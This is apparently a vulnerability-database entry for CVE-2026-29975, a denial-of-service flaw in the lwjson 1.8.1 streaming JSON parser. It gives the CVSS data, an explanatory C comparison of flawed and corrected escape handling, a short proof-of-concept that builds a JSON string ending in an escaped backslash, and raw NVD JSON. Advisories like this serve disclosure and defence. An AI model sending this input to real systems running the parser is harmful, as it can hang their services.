Security Vulnerability Report
CVE-2026-29975 CVSS 7.5 HIGH

CVE-2026-29975

Published: 2026-05-08 16:16:10
Last Modified: 2026-05-12 14:51:22

Description

lwjson 1.8.1 contains an improper input validation vulnerability in the streaming JSON parser (lwjson_stream.c). The end-of-string detection logic incorrectly identifies escaped quote characters by only checking the immediately preceding character rather than counting consecutive backslashes, causing valid JSON strings ending with an escaped backslash (like "\\") to never terminate parsing. A remote attacker can send well-formed JSON to cause applications using lwjson_stream_parse() to hang indefinitely, resulting in denial of service.
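The end-of-string logic described above, as an added example (not lwjson's code and not part of the original record): the previous-byte check is shown beside a backslash-parity check, each fed one byte at a time. The names `str_state_t`, `closes_prev_only`, `closes_parity` and `string_end` are hypothetical, and the sample strings are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical scanner state for the bytes inside a JSON string (not lwjson's types). */
typedef struct {
    char prev;        /* last byte seen, used by the flawed check */
    int  esc_pending; /* 1 while an unpaired backslash precedes the next byte */
} str_state_t;

/* Flawed pattern: a quote counts as escaped whenever the previous byte is '\\'. */
static int closes_prev_only(str_state_t *s, char c) {
    int end = (c == '"' && s->prev != '\\');
    s->prev = c;
    return end;
}

/* Corrected pattern: track backslash parity, so "\\" is consumed as one escape pair. */
static int closes_parity(str_state_t *s, char c) {
    if (s->esc_pending) { s->esc_pending = 0; return 0; } /* c is the escaped byte */
    if (c == '\\')      { s->esc_pending = 1; return 0; } /* starts an escape */
    return c == '"';
}

typedef int (*closes_fn)(str_state_t *, char);

/* Feed the bytes that follow an opening quote one at a time, as a streaming
 * parser would. Returns the offset of the closing quote, or -1 if the input
 * runs out while the scanner still believes it is inside the string. */
static long string_end(const char *body, closes_fn closes) {
    str_state_t s = {0, 0};
    size_t len = strlen(body);
    for (size_t i = 0; i < len; ++i)
        if (closes(&s, body[i])) return (long)i;
    return -1;
}

int main(void) {
    /* Constructed samples: string bodies after the opening quote. */
    const char *samples[] = { "value\\\\\"}", "a\\\"b\"", "x\\\\\\\"y\"" };
    for (size_t i = 0; i < 3; ++i)
        printf("%-12s prev-only=%ld parity=%ld\n", samples[i],
               string_end(samples[i], closes_prev_only),
               string_end(samples[i], closes_parity));
    return 0;
}
```

A return of -1 from the previous-byte check on the first sample is the condition the description calls "never terminate parsing"; a regression test for a patched build can assert that the same body closes at its final quote.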

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

lwjson 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-29975
 * This payload demonstrates the JSON structure that causes the hang.
 * A string ending with an escaped backslash (\\) causes the parser to fail termination.
 */
#include <stdio.h>
#include <string.h>

// Hypothetical usage context
void trigger_vulnerability(void) {
    // Malicious JSON payload: the value of "test" ends with an escaped backslash.
    // Bytes produced by the C literal below: {"test":"value\\"}
    // Decoded JSON string value: value followed by a single backslash.
    const char *malicious_json = "{\"test\":\"value\\\\\"}";

    printf("Sending payload: %s\n", malicious_json);

    // If processed by vulnerable lwjson_stream_parse():
    // The parser sees the final quote, looks back, sees a backslash.
    // It thinks the quote is escaped, but the backslash was actually escaping itself.
    // Result: Infinite loop / Hang.
    // lwjson_stream_parse(parser, malicious_json, strlen(malicious_json));
}

int main(void) {
    trigger_vulnerability();
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29975", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:10.213", "lastModified": "2026-05-12T14:51:21.830", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "lwjson 1.8.1 contains an improper input validation vulnerability in the streaming JSON parser (lwjson_stream.c). The end-of-string detection logic incorrectly identifies escaped quote characters by only checking the immediately preceding character rather than counting consecutive backslashes, causing valid JSON strings ending with an escaped backslash (like \"\\\\\") to never terminate parsing. A remote attacker can send well-formed JSON to cause applications using lwjson_stream_parse() to hang indefinitely, resulting in denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "references": [{"url": "https://gist.github.com/dwilliams27/b99fd41be5d6848691797042cbfc1103", "source": "[email protected]"}, {"url": "https://github.com/MaJerle/lwjson/blob/develop/lwjson/src/lwjson/lwjson_stream.c#L362-L364", "source": "[email protected]"}, {"url": "https://github.com/MaJerle/lwjson/tree/develop", "source": "[email protected]"}, {"url": "https://gist.github.com/dwilliams27/b99fd41be5d6848691797042cbfc1103", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}